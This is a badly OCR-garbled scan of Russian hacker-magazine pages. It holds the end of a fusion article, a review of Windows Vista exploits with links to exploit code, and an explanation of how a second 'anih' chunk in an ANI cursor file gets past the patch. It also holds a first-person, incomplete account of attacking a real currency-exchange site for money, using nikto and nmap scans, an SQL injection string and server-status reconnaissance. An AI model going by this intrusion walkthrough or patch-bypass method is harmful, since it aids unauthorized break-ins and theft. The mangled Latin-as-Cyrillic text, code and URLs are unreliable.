На одной из сторон кристалла (с положитель- 
ным потенциалом) закреплен оченьострый 
вольфрамовый наконечник. Сильное поле на 
его конце ионизирует атомы дейтерия, которые 
попадают в непосредственную близость к 
игле. На большой скорости они бомбардируют 
мишень, богатую дейтерием (пластину из дей- 
терида эрбия (ЕгЭЗ)), и при некоторых из таких 
столкновений между ядрами дейтерия проис- 
ходит реакция синтеза. В установке образуются 
ядра гелия и нейтроны сэнергией 
2,5 мегаэлектронвольта. 



«Запасы дейтерия в Мировом океане практически 
неограниченъ!, и он может стать буквально неис- 
черпаемым источником энергии для человечества 
на многие века, но лишь при условии, что удастся 
заставить ядра дейтерия вступить между собой в ре- 
акцию синтеза» 
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> Проект космического корабля стермоядерным двигателем 



Разумеется, пока ни о каком энергетическом 
реакторе тут речи и не идет, но авторы работы 
говорят, что такое устройство можно использо- 
вать как карманный и очень простой генератор 
нейтронного излучения, так как ихустановка 
выдает в 400 раз больше фона. Конечно, такой 
выход нейтронов намного ниже, чем у коммер- 
чески доступных нейтронных генераторов. Но 
зато ни один из последних не обладаеттакими 
малыми размерами и не нагревается в процес- 
се работы так слабо. 

Круто, но это изобретение впечатляет меньше, 
чем открытый недавно пузырьковый синтез. Ты 
не поверишь, температура в центре охлопыва- 
ющихся пузырьков газа внутри жидкости может 
доходить до 1 бтысяч градусов Цельсия. При 
этом внутри них образуется плазма, и можно 
говорить о «термояде в стакане». 

Явление сонолюминесценции было известно 
давно. Суть его втом, что при прохождении 
ультразвука через жидкость (при ряде условий) 
волны плотности вызываютбыстрый рост и 
стремительное охлопывание маленьких пу- 
зырьков газа, растворенного в этой жидкости. 
По некоторым данным, стенки этих пузырьков 
устремляются навстречу друг другу со скоро- 
стью до одного километра в секунду, а ударная 
волна разогревает газ внутри до состояния 
плазмы. То есть сверхбыстрое колебание дав- 
ления вжидкости вызывает рости охлопывание 
пузырьков. При этом их высокая температура 
способна отделять электроны от их «родных» 
атомов, а в итоге образовывается плазма. 

Если же эксперимент проводить в «тяжелом 
ацетоне», то есть в ацетоне, в котором все 
атомы водорода заменены дейтерием, то при 
охлопывании пузырьков проходит ядерный 
синтез. В простой пробирке. На столе. Научное 



сообщество до сих пор ломает копья и 
в защиту этого факта, и опровергая его, 
пытаясь подвести однутеорию под другую. 

Но фактостается фактом —термоядерный 
синтез действительно проходит в пробирке 
с тяжелым ацетоном под воздействием 
ультразвука. 

Неограниченные энергетические возмож- 
ности, которые в недалеком будущем сулит 
этот метод, могут изменить многое в мировой 
экономике. И действительно, ведь это 
энергия почти просто так, из пробирки! Без 
необходимости строитьтокамаки и лазерные 
установки. Сегодня это звучит почти фантас- 
тично. Нотрудно сказать, что будетзавтра. 

□ Заключение 

Какни крути, основные вехитермоядерной 
«эпопеи» еще впереди: промышленный ре- 
актор, а затем и производство электроэнер- 
гии из подручных средств — мусора, отходов 
(такая возможность есть, но опять-таки сов- 
ременные технологи и пока не позволяют). А 
если сыграет«пузырьковый» козырь, то не за 
горами появление настольныхавтономных 
генераторов... 

Некоторые мечтатели всерьез рассматрива- 
ют возможность установки термоядерного 
привода на корабли и даже самолеты! Если 
это станет реальным, то когда-нибудь, чем 
черт не шутит, мы услышим о космических 
кораблях на термоядерной тяге. 

Но пока практическийтермояддальше от 
реализации, чем хотелось бы, хотя ключе- 
вые станции под названием «токамак» и 
« N I Р » мы уже успешно проехали. Впереди 
— «ИТЭР» и «пузырьковый синтез». Будем 
надеяться, физики не подкачаютЖ 
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ІКРИС КАСПЕРСКИ 



Сегодняшний обзор эксплойтов мы 
посвятим ѴѴІпсІоѵѵз Ѵі$і:а, количество дыр 
в которой, несмотря на все заявления 
МісгозоЛ, довольно значительно, и мно- 
гие из них критические (а ведь поставки 
Висты только начались). МісгозоіД едва 
успевает выпускать заплатки, а хакеры 
тем временем находят все новые и новые 
дыры. 
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> Сайтхакера ІѵапІеЮи 





> Блог одного из разработчиков ѴѴ6А, при- 
знающего новыйтип атаки 



ЕОІ: ЛПКПЛЫШЕ 
ПОВЫШЕНИЕ ПРИВИЛЕГИИ 

ВПІЕР 

Графическая подсистема ѴѴІпсІоѵѵз (6йІ) про- 
должает оставаться одной большой дырой, 
значительная часть которой интегрирована 
в ядро и реализована в драйвере ѵѵіп32к. вуз. 
Однако ОБІ активно использует адресное 
пространство пользовательского процес- 
са, помещая все элементы интерфейса в 
специальные объекты -секции, защищенные 
от непреднамеренной записи со стороны 
пользовательского приложения, но допуска- 
ющие умышленное проецирование секции 
на другой регион с атрибутами записи. 
Впервые это было обнаружено в далеком 
2004 году хакером по имени Севаг Сеггибо. А 
чуть позже появился бОІКегпеІРоб-ехрІоіі:, 
находящий 601-объекты тупым перебором 
обработчиков (НапсІІез) и ставящий на то, 
что первый же найденный обработчик и есть 
указатель на секцию с 601-объектом. Это 
справедливо для ѴѴІпсІоѵѵз 2000 с ХР, но Виста 
и 2003 Эегѵег реализованы немного иначе, 
и потому эксплойт на них не работает. Эоеі 
Егікззоп усовершенствовал технику поиска 
601-секции путем введения дополнитель- 
ных проверок на соответствие размеров 
найденного блока минимально возможному 
раз меру табл и цы 601, а также анализу полей 
пііррег, РгосеззЮ и пТуре, значения которых 
известны заранее. 

ТПКЕЕТ5 

Уязвимости подвержены все платформы 
линейки ЫТ до ѴѴІпсІоѵѵз Виста 
включительно. 



ЕХРІ.ШТ 

Исходный кодэксплойта на би, написан- 
ный хакером ІѵапІеШи, можно скачать с 
ѵѵѵѵѵѵ.гтіі[ѵѵ0гт.сот/ехрІ.оіі5/3688 . 

Байтом 

МісгозоГС нетолько не предоставила 
заплатку, но даже не обозначила сроки ее 
появления в обозримом будущем. Так что эта 
дыра обещает стать весьма продуктивной ла- 
зейкой для хакеров и всяких прочих червей. 



Е5К55: ГШШШЕЕТБЕННЫЕ 
УЯББИПШЕТИ 

БНІЕР 

65Р55 — клиент-серверная подсистема 
времени выполнения, реализованная в про- 
цессе сзгзз.ехе. Это важнейший компонент 
архитектуры ѴѴІпсІоѵѵз N1, обеспечивающий 
работу всехустановленных подсистем. 
Практически сразу после выхода Висты в 
65П55 обнаружились сразутри критические 
ошибки, позволяющие завешивать систему, 
повышать локальные привилегии и даже 
выполнять удаленный зЬеІІ-код. 

Первая ошибка, найденная хакером по 
кличке N11 И, описана на ѵѵѵѵѵѵ.зесигіМосиз. 
сот/ЬісІ/21 688 и сидит внутри функции 
ЫіРаізеНагсІЕггог, которая при передаче ей 
стартового адреса одного из потоков сзгзз.ехе 
обрушивает систему. Вторая ошибка, обна- 
руженная компанией еЕуе ОідііаІЭесигку, 
связана с процедурами удаленного вызова 
ЕР6/АЕР6, позволяющими приложениям 
взаимодействовать через АріРогГы, допус- 
кающие повторное открытие. Технические 
подробности содержатся в отчете еЕуе: 
ѵѵѵѵѵѵ.зесигіМосиз.сот/а гсИіѵе/1 /465233 . 
Третья ошибка, обнаруженная Тіт'ом 
баггеі'ом, сидит в библиотеке ѴѴІЫЗРАШи-. 
Подробности об этом можно почитать на 
ѵѵѵѵѵѵ.5есигіМоси5.сот/ЬісІ/23324/іпі : о . 

ТНКЕЕТ5 

Уязвимы практически все системы линейки 
ЫТ, включая М іеговой ѴѴІпсІоѵѵз Ѵізіа х64 
Есііііоп 0, Ѵізіа Шітаіе и т.д. 



ЕНРЮІТ5 

ѵѵѵѵѵѵ.зесцгіЫосиз.сот/сІаІа/ѵцІпегаЬІШііез/ 

ехр[оііз/21688.сз . 

ѵѵѵѵѵѵ.зесцгіЫосцз.сот/сІаіа/ѵиІпегаЬІІІІІез/ 

ехрІоііз/21688-с . 

Байтом 

Місгозоб: выпустила заплатки для всехтрех 
дыр. Поэтому для защиты своего компьютера 
достаточно скачать последние обновления 
(поумолчанию система это делает 
автоматически). 



НІМ00Н5 ЕЕМШНЕ НЕ"- 
УННТНЕЕ: ББЛОГЛ ЧЕРЕБ 
□ЕМ БІ05 

БНІЕР 

ѴѴІпсІоѵѵз бепиіпе Абѵапіаде — самый мерз- 
кий компонент, ответственный за проверку 
подлинности регистрационных ключей, 
привязывающийся кжелезу и требующий 
повторной активации при его замене, что 
напрягает нетолько любителей халявы, но и 
обладателей лицензионных копий. Являясь 
в связи с этим соблазнительным объектом 
атак, ѴѴ6А уже давно и стреском взломан, 
несмотря на яростное сопротивление со 
стороны МісгозоИ 

бчередной метод взлома базируется на том, 
что ряд крупных бЕМ-поставщиков отказа- 
лись отустановки Висты и стали коситься в 
сторонулагеря І_іпих и В5й. Місгозо^тутже 
пошла на уступки и включила в Висту код, 
проверяющий ВІ65 на принадлежность к 
определенному кругу 6ЕМ-поставщиков и в 
подобном случае нетребующий активации. 
Хакерытутже дизассемблировали код и вы- 
яснили, что ѴѴбАищетв ВІбЭ'е специальную 
идентификационную строку, бдни тутже ки- 
нулись перешивать ВІОЗ’ы, рискуя угробить 
компьютер, вто время какдругие внедрили в 
загрузчикоперационной системы програм- 
му, проецирующую Ьооі-блок в оперативную 
память и уже в памяти дописывающую под- 
ходящую идентификационную строку. Третьи 
же пошли по пути перехвата системных 
функций, читающих ВІ65 и возвращающих 
результат «6 К» или «не 6 К». 

ТНКЕЕТ5 

Все версии Висты. 

ЕНРЮІТ5 

МісгозоГ: ведет борьбу со всеми, кто отва- 
живается выложить код «ломал ки» в сеть, 
поэтомулинки постоянно меняютадреса. То 
же самое относится и ксписку идентифика- 
ционных строк. 

Бпипшн 

Купить лицензионную версию Висты. 
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□ АЫІ-формат: 

удаленное переполнение буфера 
ВгіеТ' 

В 2005 году компания еЕуе Оідііаі Зесигііу об- 
наружила классическое переполнение буфера 
в функциях, обрабатывающиханимированные 
курсоры (АЫІ), уведомила М ісгозобі: и выпусти- 
ла свою собственную заплатку, не дожидаясь 
выхода официального обновления. МісгозоК 
исправила ошибку, но полного аудита кода, 
естественно, не провела. И вот в конце марта 
2007 года та же самая компания еЕуе Оідііаі 
Зесигііу выловила в дикой природе несколько 
атакующих программ, работающих по схожему 
принципу и поражающихХР5Р2 вместе столько 
что вышедшей Вистой. еЕуе Оідііаі 5есигіѣу сно- 
ва уведомила МісговоО: и выпустила обновлен- 
ную версию своей заплатки вместе с исходными 
текстами. На их основе хакер по кличке беѵсосіе, 



со ссылкой на СѴЕ 2007-1 765, создал ргооб-об- 
сопсері ехріоіі, попавший на тіІѵѵОгт [ ѵѵѵѵѵѵ. 
тіІѵѵОгт.сот/ехрІоіів/ЗбІ 7 ]. Затем последовал 
эксплойт отхакера гшагви, заявившего, что экс- 
плойт от беѵсобе у него не работает. Эксплойту 
от гшагви удалось засветиться на Зесигііу Еосив 
[ ѵѵѵѵѵѵ.зесигіЫосиз.сот/Ыб/23373 ) и тіІѵѵОгт 
[ ѵѵѵѵѵѵ. тіІѵѵОгпп.сот/ехрІоіІз/3647 ]. завешивая 
множество приложений: ѴѴогІсІ, ѴѴІпАтр, 
проводник и ІЕ (последний — только при 
отключенном ОЕР'е). Тем не менее, уязви- 
мости был присвоен «локальный» статус, 
и некоторое время ей неуделяли никакого 
внимания. Затем последовал бум эксплой- 
тов, работающих даже при активном ОЕР'е 
[ ѵѵѵѵѵѵ. т іІѵѵОгт. со пл/ехрІоіІв/3652 ). Это позволи- 
ло атаковать Висту с настройками поумолчанию 
путем посылки письма санимированным курсо- 
ром внутри или размещением этого же курсора 
на ѵѵеЬ-страничке, посещаемой жертвой. Тогда 



же появилисьэксплойты, пробивающиезаплат- 
ку от е Еуе [ ѵѵѵѵѵѵ. тіІѵѵОгт.сот/ехрІоіІз/3636 ) , 
за которыми последовал готовый генератор 
эксплойтов [ ѵѵѵѵѵѵ. тіІѵѵОгт.сот/ехр Іо ііз/3651 ). и 
атаки возобновились с новой силой. Компания 
2еіі, проанализировав ситуацию, устано- 
вила, что заплатка отеЕуе исправляетлишь 
частьуязвимого кода, оставляя другую часть 
нетронутой. Заплатка, выпущенная компанией 
2еіі, полностью ликвидировала уязвимость, 
заткнув течь [ Ьі1:р://2егЕІ50іЕогд/абѵІ50гіе5/ 
геіі-2007-01 .Ыгп і. а через некоторое время 
вышло внеплановое официальное обновление 
от МісгозоЙ, поумолчаниюустанавливающе- 
еся на Висту в автоматическом режиме. Но 
учитывая, что достаточно многие пользователи 
предпочитают скачивать обновления вручную 
(то есть не скачивать их вообще) и что данная 
уязвимость затрагивает не только Висту, но и 
всех ее предшественниц излинейки ЫТ, атаки 
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> «Живой» курсор в Ьіеѵѵ'е 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



закончатся еще не скоро. Поэтому имеетсмысл остановиться на этой 
дыре и рассмотреть ее поподробнее. 

Все версии Висты: МісгозоК ѴѴіпсІоѵѵз Ѵізіа х64 Ебіііоп 0, Ѵізіа Шітаіе, 
Ѵізіа Ноте Ргетіит, Ѵізіа Ноте Вавіс, Ѵізіа Епіегргізе, Ѵізіа Визіпезз 
и ѴѴіпсІоѵѵз Ѵізіа 0. 



Специальное предложение : 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



Ехріоі^г 

ШрУ/ѵѵѵѵѵѵ.тіІѵѵОгт.сот/ехрІоіІз/ЗбІ 7 : 
ЬНр://ѵѵѵѵѵѵ.ті[ѵѵ0гтхот/ехр1.оіі5/3634 . 
Шр://ѵѵѵѵѵѵ.ті[ѵѵ0гт.сот/ехр[оіІ5/3635 . 
ЬирУ/ѵѵѵѵѵѵ.тіІѵѵОгт.сот/ехрІоіІз/ЗбЗб . 
Шр://ѵѵѵѵѵѵ.ті[ѵѵ0гт.сот/ехр[оіІ5/3647 . 

Ы:1:р ://ѵѵѵѵѵѵ. ті1ѵѵ0гт.сот/ехр1оі1:з/3648 . 
ШрУ/ѵѵѵѵѵѵ.тіІѵѵОгт.сот/ехрІоіІз/ЗббІ . 
Ьир://ѵѵѵѵѵѵ.ті[ѵѵ0гт.сот/ехр[оіІ5/3652 . 
Шр://ѵѵѵѵѵѵ.ті[ѵѵ0гт.сот/ехр[оіІ5/3692 . 
ШрУ/ѵѵѵѵѵѵ.зесигіМосиз.сот/сІаІаА/иІпегаЬІІІІІез/ехрІоіІз/апі 
Іоасіітаде сбипкзІ2е2.гЬ . 

ЬирУ/ѵѵѵѵѵѵ.зесигіЫосиз.сот/сІаІа/ѵиІпегаЫШііез/ехрІоіІз/апі 
Іоасіітаде сЬипкзіге.гЬ . 

ЬирзѴ/ѵѵѵѵѵѵ.іттипіІуіпс.сот/сІоѵѵпІоасІз/іттрагІпегз/апі сигзог.іаг . 
ШрзУ/ѵѵѵѵѵѵ.іттипіІѵіпс.сот/сІоѵѵпІоасІз/іттрагІпегз/апі ѵізіа.іаг . 



■ Л ОД К ЛИ Ч О II И і? - ■ шсЬом место 
Мо пн: и 1 . 1 И офп. 

* Срои, ПоДкЛ ючвний I Москви - 14 дней, 

Р М«кяеск*й обп, - -ЧТ 1^ ДР 5(3 ДМ щ Й і 

- ѴіСТйИ-йМгіЯ ГТрЯМОГй московскаго телефоннаго и ом с ра 

■ МНОГОКЛНЯЛЬМЫ* І«ПІфОИИУ4 иомш 



ЗоІи^ІОП: 

Официальное обновление от М5. 



■ ІР -топ афония 



ОРиІІсіізсІозе 

Анимированные курсоры хранятся в файлах с расширениями апі, сиг 
и іео, которые представлены в РІЕЕ-формате (Резоигсе ІпіегсЬапде 
Рііе Еогтаі — файловый формат для обмена ресурсами) и имеют 
тэговую структуру, состоящую из порций данных произвольного 
типа, называемых«чанками» (отанглийского«сбипк» — «ломоть», 
«большой кусок»), РІЕЕ-формат неплохо документирован и, помимо 




> «Живые» курсоры также могут быть заражены 
вирусами и прочей фигней 



* БыДѵЛѵНны* ЛИНИИ ИНТарнѵТ 
- К а рп орл т ып и 1. 1 * чистим* ЪЪТЩ 



« Хостинг, успуги сІлЗа-цвнтрд 



РЛ7 Телеком 
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анимированных курсоров, используется для 
хранения аудио- и видеоданных. Примерами 
РІЕЕ являются аѵі, ѵѵаѵ и тісіі-файлы. 

За анимированным курсором закреплентэг 
«апіЬ» (61 И 6 ЕИ 69Н 68Н), а сам чан к имеет следу- 
ющую структуру: 

СТРУКТУРА ЧАН КА « АИ I Н » 

| зкгиск АШ Скипк 
{ 

скаг кад[4] ; // АЗСІІ-тэг 

«ааіІЬ.» 

БѴ\ЮКБ зіге; // длина чанка в 
байтах 

скаг бака[зіге] ; // данные, 
описывающие «раскладку» курсора 
в файле 
} 

Образцы правильныханимированных курсоров 
можно выдернуть из штатной поставки ѴѴІпсІоѵѵз 
(они расположены в папке \\Д/ІМЫТ\Сиг50Г5\). 
Ниже приведен фрагмент одного из них: 

ФРАГМЕНТ ДАМПААНИМИРОВАННОГО 
КУРСОРА СОШ-АМ, ПОЗАИМСТВОВАННЫЙ 
ИЗ ШТАТНОГО КОМПЛЕКТА ПОСТАВКИ 
ѴѴШ00ѴѴ5 
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Несмотря на то что, по спецификациям от 
МісгобоЙ, поле сіаіа может иметь произ- 
вольную (и формально ничем не ограни- 
ченную) длину, программисты из МісгозоЙ 
своих собственных спецификаций не 
читают, размещая в бабе структуру, состоя- 
щую ровно из 24И байт. Их функция изег32. 
бШІоабСигвогІсопРготРІІеМар, вызыва- 
емая из функции Ц5ег32.сШ! боасі Ап і I соп, 
копирует в буфер фиксированного размера 
посредством функции тетсру(сІ5І, зге, 
зііе), без всяких проверокзіге на коррект- 
ность размера ! 

Естественно, если зіге больше 24Ь, проис- 
ходит классическое стековое переполнение 
с подменой адреса возврата и возможнос- 
тью передачи управления на зНеІІ-код, 
находящийся здесьже, в массиве баіа. Для 
предотвращения переполнения компания 
еЕуе модифицировала функцию боасІСигБОГІс 
опРготРІІеМар (псевдокод которой приведен 
ниже), добавив явную проверку на размер. 
Точно также поступала и Мі егозой вевоейза- 
платке, выпущенной под кодовым названием 
М505-002. 

ИСПРАВЛЕННЫЙ ПСЕВДОКОД УЯЗВИМОЙ 
ФУНКЦИИ І-0А0СІІК50КІС0МГК0МРІІ-ЕМАР, 
ЧИТАЮЩИЙ ЧАНКИ ИЗ АНИМАЦИОННЫХ 
ФАЙЛОВ 

іпк ЬоабСигзогІсопРгошРіІеМар ( 
зкгиск МарребЕіІе* кііе, 

. . .) 

{ 

зкгиск АШ Скипк скипк; 

// 2 4к- байтовая структура 
зкгиск АШНеабег кеабег; 



/ / читаем первые 8 байт чанка 
(в них расположен АЗСІІ-тэг) 

ВеабТад ( кііе , &скипк) ; 

// это наш тэг «апік»? 

ІТ (скипк. Рад == " апік" ) 

{ 

// проверяем размер на кор- 
ректность 

+ іб (скипк. зіге != 36) // 
добавлено М805-002 и еЕуе 

// если размер != 2 4к, отва- 
ливаем 

+ гекигп 0; 



/ / читаем чанк в локальный 
буфер фиксированного размера 
КеабСкипк ( Тііе , &скипк, 

&кеабег) ; 

} 

Однако оказалось, что, если в файле присутс- 
твуетболее одного «апіб»-чанка, второй и все 
последующие чанки обрабатываетсовершен- 
но другой код, сосредоточенный в функции 
ІІ5ЕР32.0ШЕоабАпіІсоп и, естественно, рабо- 
тающий потой же схеме, что и первый (то есть 
никаких проверок не выполняющий), поскольку 
программисты из МісгозоЙуже давно освоили 
метод сору’п'разіе, а выполнятьаудит всего 
кода лень, да и времени нет: 

ПСЕВДОКОД УЯЗВИМОЙ ФУНКЦИИ 
ЮАОАММСОМр ОБРАБАТЫВАЮЩИЙ 
ВТОРОЙ И ВСЕ ПОСЛЕДУЮЩИЕ «АМН»- 
ЧАНКИ 

іпб ЬоабАпіІсоп ( 

збгисР МарребРіІе* Тііе, 




збгисР АЫІСкипк скипк; 

// 24к-байтовая структура 
збгиеР АБІНеабег кеабег; 



текііе (1) 

{ 

// читаем первые 8 байт чан- 
ка (в них расположен А8СІІ-тэг) 
КеабТад ( Тііе , &скипк) ; 

//в зависимости от типа 
тэга делаем либо то , либо другое 
зѵ7ІСск (скипк. Рад) 

{ 

сазе ' зед ' : // обраба- 
тываем тэг «зед» 



сазе 1 Ы8Т ' : // обраба- 
тываем тэг «Ы8Т» 



сазе 'гаке': // обра- 
батываем тэг «гаке» 
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сазе ' апіЬ. ' : 

// обрабатываем тэг «апік» 

// читаем скипк.зіге в 2 41 т— байтовую 

структуру 

КеабСЬлтк ( Іііе , &скипк, &Ьеабег) ; 

Таким образом, чтобы пробить заплатку от еЕуе или официальный патч 
М505-002 от МісгозоЛ, необходимо поместить в апі-файл два чанка: 
правильный и вызывающий переполнение. 

Дамп одного из таких файлов приведен ниже. Он не несет на 
своем борту никакого зЬеІІ-кода и «всего лишь» вызывает исклю- 
чение при попытке просмотра анимированного курсора любым 
приложением, поддерживающим этот формат, например знамени- 
тым I гба п Ѵіеѵѵег: 
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ОТ ЕЕУЕ ВМЕСТЕ С ОФИЦИАЛЬНЫМ ПАТЧЕМ М505-002 ОТ 
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А что на счет Іпіегпеі; Ехрогег? Его, в отличие от I гба п Ѵіеѵѵег, 
заставить выполнять зЬеІІ-код не так-то просто. Помимо всего 
прочего, необходимо обойти защиту от выполнения кода в 
стеке (известную под кодовым именем йЕР — Оаіа ЕхесиЛоп 
Ргеѵепііоп), обхитрить механизм рандомизации адресного 
пространства (АЗбР — Аббгевз 5 расе Іауоиі гапботігаііоп) и 
преодолеть проверку целостности адреса возврата, выполняемую 
функцией при трансляции программы компилятором МісгозоЛ 
Ѵізиаі С++ 7.хсключом/Ѳ5. 

йЕР, А5ЕР и/05 — вот три причины, по которым большинство 
эксплойтов отказывается работать на Висте, функционирующей 
на процессоре с поддержкой флагов МХ/Хй (аппаратный йЕР). Все 
эти защиты достаточно легко обойти (впрочем, как и все осталь- 
ное, сделанное МісгозоЛ), но это уже тема совершенно другого 
разговора. Любопытствующих отсылаю к сборнику моих статей 
( ШрѴ/пегиті.огд.гиА/ізІа-оѵегзІаск-раск.гір ). подробно рассмат- 
ривающих методику борьбы со всей «святой троицей». т 
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ШТУРМ ОБМЕННИКА ЭЛЕКТРОННЫХ ВАЛЮТ 

Одним весенним днем у меня на телефоне закончились бабки, и чтобы исправить эту 
ситуацию, я решил, не выходя из дома, купить карту через инет. Действительно, зачем 
идти куда-то за картой, если сегодняшние технологии позволяют купить РГМ-коды карт 
оплат через интернет, не обладая никакими особенными познаниями. Зайдя в Гугл и 
введя запрос вроде «РГМ-коды за ѴѴеЬМопеу в Мой_Город», я нашел то, что искал. Даже 
более того — там можно было вводить и выводить ѴѴеЬМопеу, купить любую интересу- 
ющую меня карту оплаты операторов мобильной связи, какие-то карты для онлаин-игр 
и прочий полезный стафф. И тут мне в голову пришла интересная идея . . . 



ОІп РгаисІѴѴе Тгизі 

Идея была оченьсомнительной. Меня очень 
заинтересовал этот сайт, ноя был неуверен в 
том, что его стоит щупать на предмет багов. Ведь, 
какправило, администраторы таких ресурсов 
нелохи, иза попытку взлома можно серьезно 
получить по шарам. Но мысльотом, что на мобилу 
можно скинуть, кпримеру, 100 баксов, мне не 
давала покоя, и я принял решение взломать 
обменник. Но прежде всего надо было позабо- 
титься о безопасности, которую я условно разбил 
на две части: ѴРЫ иЗоскв. Свалив наулицу и 
вернувшисьуже ближе к ночи, я открыл браузер, 
загрузил главную страницу сайта... И понеслось... 

О Изучаем структуру сервера 

Сайтобменника был целиком написан на РНР. Ми- 
нимальное количество скриптов и ничеголишнего 



— никаких гостевых, форумов я не нашел. Беглый 
осмотр скриптов на такие распространенные баги, 
как50І_/РНР-инъекция, РНР-инклуд иХ55, ничего 
полезного недал.Тутя решил немного схалявить 
и просканировать сайтССІ-сканером на наличие 
директорий и потенциально опасныхскриптов. В 
качестве СбІ-сканера я выбрал нынеуже ставший 
классикой сканер Ыікіо. Он бесплатен, имеет 
огромную базууязвимостей, постоянно обновляет- 
ся и характеризуется кроссплатформенностью.так 
какнаписан на скриптовом языке Регі. Впрочем, 
хватитописания. Я запустил сканер на шелле в 
режиме обычного сканирования: 

./пікДо.рІ -ТюзЦ зіісе.иа -депегіс 

Не поленился открыть второе окошко РиТТУ, 
залогиниться на том же шелле и запустить 



птар, чтобы узнать, какие порты открыты на 
удаленном хосте: 

. /птар -зТ -Р зіРе.иа 

Сканер портов сработал довольно шустро, и 
перед глазами предстала следующая картина: 
на сервере крутились РТР, 55Н, НТТР/НТТР5, 
Р0РЗ/5МТР, ЫТр- прокси 50111 Б, ну и еще 
пара ненужных сервисов. Что касается 50 ІЛ Б, 
он был самой последней версии, так что на 
халяву ничего не могло пройти. В то время как 
я исследовал работу сервера в целом, N і кіо 
уже нашел кучу всего. Самое минимальное, 
что можно было выделить, — это нестойкий 
к переполнениям модульАпача тосі_55І, 
проэксплойтить который мне, к сожалению, не 
удалось. 
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Зато меня порадовали директории. Сначала 
я заглянул в папку /ісопв, даже и не надеясь 
найти там что-то интересное :). Далее выясни- 
лось, что на сервере стоит рЬрМуАсітіп в одно- 
именной папке. А это уже интересно. Затем 
админка, которая находилась в /сопбд. При ее 
осмотре на наличие 50 1_- инъекции, с помо- 
щью которой можно было бы войти в админку 
по за просу типа «' ог Т = Т», я снова ничего 
не нашел. Я подождал еще немного, и сканер 
скинул мне линки на/ѵѵебтаіі (с неетоже было 
нечего взять) и на Еггог_Еод, в котором мне 
посчастливилось обнаружить логошибок в 
РНР-скриптах: 

[20-Бес-2005 23:56:19] РНР 
Шагпіпд: Дііе (пемз . хті ) : Даііесі 

До ореп зДгеат: N 0 зисЬ. Дііе ог 
сІігесДогу іп /Дюте/тесіісаіс/ 
риЪІ іс_]зЦт1 /топеу/хті .рЬр оп 
Ііпе 14 

[20-Бес-2005 23:56:19] РНР 
Шагпіпд: :]оіп() : Вас! агдитепДз. 

іп /Ьоте/те<ііса1с/риЫіс_НДт1/ 
топеу/хті .різр оп Ііпе 14 
[20-Бес-2005 23 : 56: 19] РНР РаДаІ 
еггог: Саіі До а тетЬег ДипсДіоп 

оп а поп-окфесД іп /Ноте/ 
тесіі саі с /риЫіс_ЬДт1 /топеу/хті . 
рНр оп Ііпе 2 6 

[20-Бес-2005 23 : 59 : 03 ] РНР РаДаІ 
еггог: Саіі До а тетЬег ДипсДіоп 

оп а поп-оЬ^есД іп /Ноте/ 
тес!іса1с/риЫіс_]тДт1 /топеу/хті . 
рЬр оп Ііпе 2 6 
[21-Бес-2 005 00:03:49] РНР 
Шгпіпд: Дореп ( гзз . хті ) : Даііесі 

До ореп зДгеат: Регтіззіоп сіепіесі 
іп /Дюте/тесіісаіс /риЪ1іс_Ь.Дт1/ 
топеу/гзз .рЬр оп Ііпе 57 
[09-Цап-2006 17:42:28] РНР 
Шгпіпд: тузд1_соппесД ( ) : Сап ' Д 
соппесД До Іосаі МуЗОЬ зегѵег 
ДНгоидЬ. зоскеД ' /ѵаг/ Дтр/тузді . 
зоск' (2) іп /Дюте/тесіісаіс/ 
риЫіс_1іДт1/топеу/іп(іех . ркр оп 
Ііпе 5 



Естественно, из ошибок вытянуть чего-ни- 
будь занятное не получилось, но это только на 
первый взгляд. Теперь совершенно очевидно, 
что скрипты работаютс Му50І_ и полный путь к 
сайту у наста ков:/Иоте/тебісаІс/риЫіс_Ы;т[/ 
етопеу. 

Ты думаешь, на этом мое исследование 
закончилось и я решил забить на обменник и 
пойти болтать в ІРС? Нет. Самое главное, что 
нашел сканер, — это/зегѵег-зіаіиз. Теперьуже 
интересно... 

□ Существенная зацепка 

Что же это за загадочная дира — /зегѵег-зіаіиз? 
Это даже не просто директория и не скрипт, а 
исключительно АрасЬе'вская примочка. Она 
отображает всю информацию о веб-сервере: 
версию АрасЬе, модули ит.д., текущее время, 
аптайм сервера, нагрузку С РІІ. Кроме того, из 
нее можно выудить просто море информации 
отом, какие сайты хостятся на всем сервере. В 
общем, выглядит это так, как на картинке. 

Я собрал списоксайтов и принялся их изучать. 

К слову сказать, их оказалось всего 5-6. Нои 
тутбыло, где разгуляться. Для тех, кто втанке, 
поясню, чему я так радуюсь: я ищу на одном из 
этих двух сайтов баги получаю шелл на сервере 
обменника. Далее если администратор сервера 
— идиоти неправильно выставил сНтосГы.то 
я постараюсьзабраться на обменник, в ином 
случае — просто подниму свои привилегии 
локально :). 

Итак, я выбрал сайт тебісаіс.иа . Почему? Да 
потому, что мне сразу понравилось, что этот 
сайт оказался в Еггог_Дод'е моего обменника с 
ошибками РНР-скрипта: 

[ 09- Бап-2 006 17:42:28] РНР 
Шагпіпд : тузд1_соппесД ( ) : Сап ' Д 
соппесД До Іосаі МуЗОЬ зегѵег 
ДЬгоидН зоскеД * /ѵаг/Дтр/туздІ . 
зоск' (2) іп /Дюте/тесіісаіс/ 
риЫіс_кДт1/топеу/іп(іех.р]тр оп 
Ііпе 5 

Это можно увидеть из директории, в которой 
находится сайт. Согласись, логично думать, что 



этот сайт и мой обменник очень тесно связа- 
ны друге другом, ведь не просто так в логах 
хранятся его ошибки. Да, кстати, тоже самое (я 
отом, какузнать, какие сайты хостятся на сер- 
вере) тебе может предложить и метод Реѵегзе 
ІР ЕоокІІр, о котором N50 писал в мартовском 
номере за 2005 год в статье «Удар по ѴѴЕВ’у». Но, 
ксожалению, сервис сІотаіпзсІЬ.огд накрылся, 
поэтому я предлагаю тебе альтернативный 
сервис ѵѵѵѵѵѵ. бота іпіооіз.сот . 

Итак, перейдя на интересующий меня ресурс 
теісісаіс.ца . я обнаружил сайт, посвященный 
медицине. Особо ей не интересуясь и потому не 
отвлекаясь, я начал осматриватьскрипты. Сна- 
чала я заглянул во что-то вроде гостевой книги 
/диезібоок, но, несмотря на все свои усилия, 
ничего найти так и не смог, хотя был уверен, что 
активная Х55 тут будетточно :). Но затем удача 
повернулась ко мне лицом, и уже через пару 
минутя нашел линк вида «іпбех.рЬр?ісІ=37». По 
привычке я поставил в переменную ісі свою элит- 
ную кавычку и увидел очень интересную ошибку: 

РНР Шгпіпд: тузд1_ДеДс]т_ 

аггау ( ) : зиррііесі агдитепД із 
